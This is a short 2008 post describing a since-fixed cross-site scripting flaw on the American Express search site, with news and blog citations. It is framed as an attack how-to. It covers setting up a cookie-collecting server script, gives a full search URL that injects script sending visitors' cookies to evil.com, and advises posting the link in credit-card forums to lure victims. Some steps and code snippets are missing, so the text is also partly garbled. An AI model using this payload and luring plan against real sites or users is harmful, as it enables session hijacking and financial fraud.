Here is a quick description of a cross-site script exploit that was fixed today on the American Express website.
All you need to do is
1) Setup a web server or register for a free web hosting service that supports any type of server-side script (Perl, PHP, ASP etc…)
2) Create a script to save the stolen cookies into a file or database and put it online.
Where XXX is your code that does what ever you want it to do. If you want to steal the cookie, it code would then be something like:
So the link to use to lure people into sending their cookies would be something like:http://find.americanexpress.com/search?q=%22%3E%3Cscript%3Elocation.href=’http://evil.com/cookie.php?’%2Bdocument.cookie%3C/script%3E
4) Place this link into forums about American Express or credit cards (since there is a better chance that people using these forums are using the Amex website, and therefore have cookies…)
Now this XSS have been fixed after it started to go public. This folk, who found the bug, had a particular hard time convincing Amex about this security problem.
A video of the simple exploit is available at :http://holisticinfosec.org/video/online_finance/amex.html
“American Express web bug exposes card holders“, Dan Goodin, The Register, December 16, 2008, http://www.theregister.co.uk/2008/12/16/american_express_website_bug/ (accessed on December 17, 2008)
 “Holistic Security”, Russ McRee, December 17, 2008 http://holisticinfosec.blogspot.com/2008/12/online-finance-flaw-american-express.html (accessed on December 17, 2008)